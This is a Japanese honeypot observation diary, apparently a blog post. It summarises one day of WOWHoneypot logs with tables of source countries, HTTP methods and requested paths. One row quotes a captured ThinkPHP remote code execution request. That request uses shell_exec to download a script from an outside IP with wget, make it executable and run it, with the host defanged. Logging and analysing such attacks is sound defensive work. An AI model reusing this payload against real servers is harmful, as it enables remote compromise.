ハニーポット観察日記(2019/01/16)
はじめに
こんにちは。cute_otterです。
今日もCowrieの調子が悪いため、ログの簡易分析はお休みします。
WOWHoneypot
ハニーポット「WOWHoneypot」で2019/01/16 (水) 00:00~23:59 UTC(運用13日目)に取得したログの簡易分析です。
概況
- 集計期間 : 2019/01/16 (水) 00:00~23:59 UTC
- 総アクセス件数 : 19 件 (前日比 -2 件)
- ユニークIPアドレス件数 : 14 件 (前日比 -7 件)
- アクセス元の国数 : 7 カ国 (前日比 -4 カ国)
国別のアクセス件数
国別のアクセス件数は以下の通りです。
| 順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
|---|---|---|---|---|---|---|
| 1. | United States | 8 | 2. | 4 | +4 | - |
| 2. | Seychelles | 6 | - | 0 | +6 | - |
| 3. | Turkey | 1 | 7. | 1 | +-0 | - |
| 4. | Poland | 1 | 9. | 1 | +-0 | - |
| 5. | India | 1 | - | 0 | +1 | - |
| 6. | Netherlands | 1 | - | 0 | +1 | - |
| 7. | Brazil | 1 | 1. | 5 | -4 | - |
メソッド
メソッドの件数は以下の通りです。
| 順位 | メソッド | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
|---|---|---|---|---|---|---|
| 1. | GET | 19 | 1. | 21 | -2 | - |
HTTPバージョン
HTTPバージョンの件数は以下の通りです。
| 順位 | HTTPバージョン | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
|---|---|---|---|---|---|---|
| 1. | HTTP/1.1 | 12 | 1. | 17 | -5 | - |
| 2. | HTTP/1.0 | 7 | 2. | 4 | +3 | - |
アクセス先
アクセス先は以下の通りです。
| 順位 | 備考 | アクセス先 | 件数 | 前日の順位 | 前日の件数 | 件数差 |
|---|---|---|---|---|---|---|
| 1. | トップページへのアクセス | GET / HTTP/1.0 | 7 | 2. | 4 | +3 |
| 2. | Gitのコンフィグファイルの探査 | GET /.git/config HTTP/1.1 | 6 | - | 0 | +6 |
| 3. | トップページへのアクセス | GET / HTTP/1.1 | 5 | 1. | 16 | -11 |
| 4. | ThinkPHPフレームワークの脆弱性(RCE)を利用した攻撃(参照) User-AgentはSefaでした。 |
GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20hxxp://167[.]99[.]219[.]142/ex[.]sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1 | 1 | - | 0 | +1 |
- ThinkPHPの脆弱性を利用した攻撃を8日ぶり(2019/01/08以来)に観測しました。
- Gitのコンフィグファイルの探査を初めて観測しました。
- 6件のアクセスは全て同一のIPアドレスからのものでした。
WOWHoneypotで取得したログの簡易分析は以上です。
